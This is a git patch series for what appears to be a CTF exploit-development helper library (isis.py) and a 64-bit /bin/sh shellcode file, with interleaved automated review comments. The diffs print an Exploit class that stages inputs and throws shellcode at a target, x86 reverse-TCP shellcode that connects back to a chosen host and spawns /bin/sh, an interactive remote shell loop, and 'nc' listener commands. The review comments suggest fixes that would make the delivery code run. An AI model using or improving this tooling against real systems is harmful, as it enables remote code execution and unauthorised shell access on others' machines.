From 365561c8e8767f776819caabb1dc91879d6d8564 Mon Sep 17 00:00:00 2001 From: ezliang Date: Tue, 17 Mar 2015 03:39:39 -0400 Subject: [PATCH 1/6] added hold debugger function basically helps with holding the debugger to attach with gdb; can pass the process name to get the last process id --- isis/isis.py | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/isis/isis.py b/isis/isis.py index 1451599..71d6f8e 100644 --- a/isis/isis.py +++ b/isis/isis.py @@ -272,6 +272,15 @@ def hd(s,n,le=True): fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) print fmt_str.format(addr,*line) addr += 0x10 + +def hold_debugger(program_name=None): + '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' + if(program_name): + print program_name+" pid:"+str(map(int,check_output(["pidof",program_name]).split())[-1]) + + print "Attach Debugger..." + while(raw_input() != 'c'): + pass if __name__ == '__main__': import code From 297161fe7734c93361e478c334147d640ae50768 Mon Sep 17 00:00:00 2001 From: ezliang Date: Tue, 17 Mar 2015 03:49:07 -0400 Subject: [PATCH 2/6] added import for hold_debugger function --- isis/isis.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/isis/isis.py b/isis/isis.py index 71d6f8e..a3c7f37 100644 --- a/isis/isis.py +++ b/isis/isis.py @@ -5,6 +5,8 @@ import telnetlib import select import string + +from subprocess import check_output from struct import pack,unpack from string import ascii_lowercase as ALPHABET From eff8ea126a2f35912e9e8d65932a4521e9d8fde5 Mon Sep 17 00:00:00 2001 From: ezliang Date: Mon, 23 Mar 2015 18:38:29 -0400 Subject: [PATCH 3/6] changed from pidof to pgrep in hold_debugger pgrep makes latest pid the last process --- isis/isis.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/isis/isis.py b/isis/isis.py index a3c7f37..8d5477e 100644 --- a/isis/isis.py +++ b/isis/isis.py 
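Review bot: `hold_debugger` has no path for the target not being found: `pidof` exits non-zero when nothing matches, so `check_output` raises `CalledProcessError` before the `[-1]` index is ever reached, and an empty result list would raise `IndexError` there, so a typo in the name aborts the exploit script with a traceback instead of reaching the "Attach Debugger..." prompt. Catch the lookup failure and print a clear "not running" message, as in the excerpt below (this needs `CalledProcessError` imported next to the `check_output` import the second patch adds). The `raw_input()` loop also raises `EOFError` when stdin is closed, e.g. when the script is driven non-interactively, so wrapping it in `try/except EOFError: pass` would let the hold be skipped rather than crash. Passing the name as a separate argv element instead of a shell string is the right call here and should be kept.
```python
def hold_debugger(program_name=None):
    '''Holds the debugger until c is pressed; optional arg to print the pid of that process'''
    if program_name:
        try:
            pids = map(int, check_output(["pidof", program_name]).split())
        except CalledProcessError:
            pids = []
        if pids:
            print program_name+" pid:"+str(pids[-1])
        else:
            print program_name+" is not running"
    # ... unchanged: "Attach Debugger..." prompt and raw_input loop ...
```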
@@ -278,7 +278,7 @@ def hd(s,n,le=True): def hold_debugger(program_name=None): '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' if(program_name): - print program_name+" pid:"+str(map(int,check_output(["pidof",program_name]).split())[-1]) + print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) print "Attach Debugger..." while(raw_input() != 'c'): From 2906af6765e59c097b6459d8a7e7fa98531cdc59 Mon Sep 17 00:00:00 2001 From: Christopher Thompson Date: Fri, 24 Apr 2015 12:09:01 +0000 Subject: [PATCH 4/6] Removed isis.py --- isis/isis.py | 291 --------------------------------------------------- 1 file changed, 291 deletions(-) delete mode 100644 isis/isis.py diff --git a/isis/isis.py b/isis/isis.py deleted file mode 100644 index 8d5477e..0000000 --- a/isis/isis.py +++ /dev/null 
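Review bot: `pgrep program_name` treats its argument as an extended regular expression matched against part of the process name, so `hold_debugger("sh")` would also report `bash`, `ssh` or `sshd`; pass `-x` to require an exact name match, `check_output(["pgrep", "-x", program_name])`. The commit message relies on output order to pick the newest process, but pgrep emits matches in the order it reads them from /proc (in practice ascending pid), which is not start-time order once pids have wrapped around; `pgrep -n` selects the most recently started match directly and would make the `[-1]` unnecessary. Like `pidof`, pgrep exits 1 when nothing matches and `check_output` then raises `CalledProcessError`, which this line still does not handle. `hold_debugger` continues past the end of the hunk.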
@@ -1,291 +0,0 @@ -import re -import socket -import time -import sys -import telnetlib -import select -import string - -from subprocess import check_output -from struct import pack,unpack -from string import ascii_lowercase as ALPHABET - - -class Exploit(): - def __init__(self, ip_addr, port, exploit_type): - self.ip = ip_addr - self.port = port - self.type = exploit_type - - self.connectback = None - self.bind = None - - self.stage = [] # list of input to send to get to arbitrary execution - self.shellcode = None - - def connect_back(self, ip_addr, port): - self.connectback = (ip_addr, port) - - def bind_shell(self, port): - self.bind = port - - def prepare(self, input): - self.stage.append(input) - - def generate(self, arch='x86'): - if self.type == 'connectback': - if self.connectback == None: - raise RuntimeError("You haven't set parameters for the connect back") - self.shellcode = reverse_tcp(self.connectback[0], self.connectback[1], arch) - elif self.type == 'bind': - if self.bind == None: - raise RuntimeError("You haven't set parameters for the bind shell") - self.shellcode = bind_shell(self.bind, arch) # needs implementation - - def display(self): - for x in self.stage: - sys.stdout.write(x) - sys.stdout.write(repr(self.shellcode)[1:-1]) - - def throw(self): # needs implementation - connect = get_socket((self.ip, self.port)) - for send in self.stage: - connect.send(send) - time.sleep(.5) - print sock.recv(0x10000) - connect.send(self.shellcode) - - -def bind_shell(port, arch='x86'): - ''' - Generate x86 bind shell shellcode (You connnect to the shell) - - Usage: - reverse_tcp(ip_addr, port) - ip_addr = connect back IP address as string - port = connect back port as int - - A command you could use to setup a connection on your system is 'nc 127.0.0.1 7788' - With 127.0.0.1 replaced with the ip of the target box. 
- ''' - - if arch.lower() == 'x86': - port = pack('>H', port) - BIND_SHELL = BIND_SHELL_X86 - pass - -def reverse_tcp(ip_addr, port, arch='x86'): - ''' - Generate x86 reverse tcp shellcode (The shell connects to you) - - Usage: - reverse_tcp(ip_addr, port) - ip_addr = connect back IP address as string - port = connect back port as int - - A command you could use to setup a listener on your system is 'nc -vl 7788' - ''' - - if arch.lower() == 'x86': - ip = ''.join([chr(int(x)) for x in ip_addr.split('.')]) - port = pack('>H', port) - - REVERSE_TCP_X86 = ( - '\x31\xc0\x89\xc3\x50\x6a\x01\x6a\x02\x43\xb0\x66\x89\xe1\xcd\x80\x89\xc6' - '\x31\xc0\xb0\x66\x43\x68' + ip + '\x66\x68' + port + '\x66\x53\x89\xe1' - '\x6a\x10\x51\x56\x43\x89\xe1\xcd\x80\x89\xc7\x31\xc9\x89\xc8\x89\xca\xb1' - '\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f' - '\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x89\xca\xcd\x80' - ) - - REVERSE_TCP = REVERSE_TCP_X86 - - elif arch.lower() == 'x64': - REVERSE_TCP = REVERSE_TCP_X64 # need implementation - - elif arch.lower() == 'arm': - REVERSE_TCP == REVERSE_TCP_ARM # need implementation - - elif arch.lower() == 'mips': - REVERSE_TCP = REVERSE_TCP_MIPS # need implementation - - banned = ('\x00', '\x0a', '\x0d') - for x in banned: - if x in REVERSE_TCP_X86: - print 'This shellcode may not work because of {} at index {}'.format(repr(x), REVERSE_TCP.index(x)) - - return REVERSE_TCP_X86 - -def is_ipv6(ip): - return ':' in ip - -def get_socket(chal): - '''chal is a 2-tuple with an address and a port ex: ('127.0.0.1',111)''' - #is ipv6? 
- ip, port = chal - if is_ipv6(ip): - s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) - s.settimeout(5) - s.connect((ip, port, 0, 0)) - else:#ipv4 - s = socket.socket() - s.settimeout(5) - s.connect(chal) - return s - - -def shell(sock): - ''' - pass to this function a socket object with a - listening shell(socket reuse) - ''' - command = '' - prompt = '$ ' - - while command != 'exit\n': - r,w,x = select.select([sock,sys.stdin], [sock], []) - if r: - for reading in r: - if reading == sock: - print reading.recv(0x10000) - if reading == sys.stdin: - command = reading.readline() - sock.send(command) - return - - -def lei(*nums): - ''' - wrapper for struct.pack("I/i"), will identify signdness and - takes a variable number of arguments - ''' - if len(nums) == 1: - num = nums[0] - if num > 0: - return pack(" 0 : - return pack("') + fmt_mapping[n] - - elems = map(lambda a:unpack(fmt,'\0'*(n-len(a))+a)[0],elems) - - addr = 0 - - for line in chunk(elems,0x10/n): - #addr, [elems..] - fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) - print fmt_str.format(addr,*line) - addr += 0x10 - -def hold_debugger(program_name=None): - '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' - if(program_name): - print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) - - print "Attach Debugger..." - while(raw_input() != 'c'): - pass - -if __name__ == '__main__': - import code - code.interact(local=locals()) - - From 071e9407be0009bb8a5085a01fbec37db4834f39 Mon Sep 17 00:00:00 2001 From: Shark64 Date: Thu, 7 May 2015 22:17:20 +0200 Subject: [PATCH 5/6] change xor reg, reg to 32bit version the x86-64 instruction behaviour is to zero the upper 32bits for 32bit operands, so xor eax, eax = xor rax, rax, but 1 byte shorter. --- 64BitLocalBinSh/shell64.s | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) 
diff --git a/64BitLocalBinSh/shell64.s b/64BitLocalBinSh/shell64.s index 1555248..044c8a9 100644 --- a/64BitLocalBinSh/shell64.s +++ b/64BitLocalBinSh/shell64.s @@ -8,13 +8,13 @@ BITS 64 global main main: - xor rax, rax + xor eax, eax push rax mov rdi, 0x68732f2f6e69622f ;/bin//sh push rdi mov al, execve mov rdi, rsp - xor rsi, rsi - xor rdx, rdx + xor esi, esi + xor edx, edx syscall From 794875fed8e42392b83255233c2e0df4af4b89c9 Mon Sep 17 00:00:00 2001 From: CodeKevin Date: Sat, 30 Apr 2016 01:19:50 -0400 Subject: [PATCH 6/6] Revert "Removed isis.py" This reverts commit 2906af6765e59c097b6459d8a7e7fa98531cdc59. --- isis/isis.py | 291 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 291 insertions(+) create mode 100644 isis/isis.py diff --git a/isis/isis.py b/isis/isis.py new file mode 100644 index 0000000..8d5477e --- /dev/null +++ b/isis/isis.py 
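Review bot: The switch to the 32-bit `xor` forms deserves an inline comment, because a reader who does not know that writing a 32-bit register zero-extends into the full 64-bit register may "fix" them back to `xor rax, rax` and re-add the REX.W byte; suggest `xor eax, eax ; zero-extends into rax, same as xor rax, rax but one byte shorter` on the first one. The later `mov al, execve` only writes the low byte, so the syscall number in rax is correct only because the upper bits are still zero from that xor; a comment such as `; rax was zeroed above, so rax = execve` on that line would pin the dependency. `execve` is presumably an `equ` defined in the first lines of the file, which lie outside the hunk.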
@@ -0,0 +1,291 @@ +import re +import socket +import time +import sys +import telnetlib +import select +import string + +from subprocess import check_output +from struct import pack,unpack +from string import ascii_lowercase as ALPHABET + + +class Exploit(): + def __init__(self, ip_addr, port, exploit_type): + self.ip = ip_addr + self.port = port + self.type = exploit_type + + self.connectback = None + self.bind = None + + self.stage = [] # list of input to send to get to arbitrary execution + self.shellcode = None + + def connect_back(self, ip_addr, port): + self.connectback = (ip_addr, port) + + def bind_shell(self, port): + self.bind = port + + def prepare(self, input): + self.stage.append(input) + + def generate(self, arch='x86'): + if self.type == 'connectback': + if self.connectback == None: + raise RuntimeError("You haven't set parameters for the connect back") + self.shellcode = reverse_tcp(self.connectback[0], self.connectback[1], arch) + elif self.type == 'bind': + if self.bind == None: + raise RuntimeError("You haven't set parameters for the bind shell") + self.shellcode = bind_shell(self.bind, arch) # needs implementation + + def display(self): + for x in self.stage: + sys.stdout.write(x) + sys.stdout.write(repr(self.shellcode)[1:-1]) + + def throw(self): # needs implementation + connect = get_socket((self.ip, self.port)) + for send in self.stage: + connect.send(send) + time.sleep(.5) + print sock.recv(0x10000) + connect.send(self.shellcode) + + +def bind_shell(port, arch='x86'): + ''' + Generate x86 bind shell shellcode (You connnect to the shell) + + Usage: + reverse_tcp(ip_addr, port) + ip_addr = connect back IP address as string + port = connect back port as int + + A command you could use to setup a connection on your system is 'nc 127.0.0.1 7788' + With 127.0.0.1 replaced with the ip of the target box. 
+ ''' + + if arch.lower() == 'x86': + port = pack('>H', port) + BIND_SHELL = BIND_SHELL_X86 + pass + +def reverse_tcp(ip_addr, port, arch='x86'): + ''' + Generate x86 reverse tcp shellcode (The shell connects to you) + + Usage: + reverse_tcp(ip_addr, port) + ip_addr = connect back IP address as string + port = connect back port as int + + A command you could use to setup a listener on your system is 'nc -vl 7788' + ''' + + if arch.lower() == 'x86': + ip = ''.join([chr(int(x)) for x in ip_addr.split('.')]) + port = pack('>H', port) + + REVERSE_TCP_X86 = ( + '\x31\xc0\x89\xc3\x50\x6a\x01\x6a\x02\x43\xb0\x66\x89\xe1\xcd\x80\x89\xc6' + '\x31\xc0\xb0\x66\x43\x68' + ip + '\x66\x68' + port + '\x66\x53\x89\xe1' + '\x6a\x10\x51\x56\x43\x89\xe1\xcd\x80\x89\xc7\x31\xc9\x89\xc8\x89\xca\xb1' + '\x02\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f' + '\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x89\xca\xcd\x80' + ) + + REVERSE_TCP = REVERSE_TCP_X86 + + elif arch.lower() == 'x64': + REVERSE_TCP = REVERSE_TCP_X64 # need implementation + + elif arch.lower() == 'arm': + REVERSE_TCP == REVERSE_TCP_ARM # need implementation + + elif arch.lower() == 'mips': + REVERSE_TCP = REVERSE_TCP_MIPS # need implementation + + banned = ('\x00', '\x0a', '\x0d') + for x in banned: + if x in REVERSE_TCP_X86: + print 'This shellcode may not work because of {} at index {}'.format(repr(x), REVERSE_TCP.index(x)) + + return REVERSE_TCP_X86 + +def is_ipv6(ip): + return ':' in ip + +def get_socket(chal): + '''chal is a 2-tuple with an address and a port ex: ('127.0.0.1',111)''' + #is ipv6? 
+ ip, port = chal + if is_ipv6(ip): + s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0) + s.settimeout(5) + s.connect((ip, port, 0, 0)) + else:#ipv4 + s = socket.socket() + s.settimeout(5) + s.connect(chal) + return s + + +def shell(sock): + ''' + pass to this function a socket object with a + listening shell(socket reuse) + ''' + command = '' + prompt = '$ ' + + while command != 'exit\n': + r,w,x = select.select([sock,sys.stdin], [sock], []) + if r: + for reading in r: + if reading == sock: + print reading.recv(0x10000) + if reading == sys.stdin: + command = reading.readline() + sock.send(command) + return + + +def lei(*nums): + ''' + wrapper for struct.pack("I/i"), will identify signdness and + takes a variable number of arguments + ''' + if len(nums) == 1: + num = nums[0] + if num > 0: + return pack(" 0 : + return pack("') + fmt_mapping[n] + + elems = map(lambda a:unpack(fmt,'\0'*(n-len(a))+a)[0],elems) + + addr = 0 + + for line in chunk(elems,0x10/n): + #addr, [elems..] + fmt_str = '{:#08x}:' + (' {{:#0{pad}x}}'.format(pad=(n*2+2)))*len(line) + print fmt_str.format(addr,*line) + addr += 0x10 + +def hold_debugger(program_name=None): + '''Holds the debugger until c is pressed; optional arg to print the pid of that process''' + if(program_name): + print program_name+" pid:"+str(map(int,check_output(["pgrep",program_name]).split())[-1]) + + print "Attach Debugger..." + while(raw_input() != 'c'): + pass + +if __name__ == '__main__': + import code + code.interact(local=locals()) + +
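Review bot: Reverting the deletion brings `isis.py` back with defects that should be fixed now that the file is live again, starting with `Exploit.throw`, which opens the socket as `connect` but then does `print sock.recv(0x10000)`, so the first staged send is followed by a `NameError`; change it to `print connect.recv(0x10000)`. In `reverse_tcp` the `arm` branch uses `==` where `=` was intended (`REVERSE_TCP == REVERSE_TCP_ARM` compares and discards), and the banned-byte scan and the `return` use `REVERSE_TCP_X86` rather than `REVERSE_TCP`, so every non-x86 arch either fails with an undefined-name error on the `_X64`/`_ARM`/`_MIPS` constants or would hand back the x86 payload; make that an assignment and use `REVERSE_TCP` in both the check and the `return`. `bind_shell` likewise references an undefined `BIND_SHELL_X86` and falls off the end returning `None`, so `Exploit.generate()` for `'bind'` cannot work; if it is intentionally unimplemented, `raise NotImplementedError("bind shell not implemented")` there so the failure is explicit at the call site.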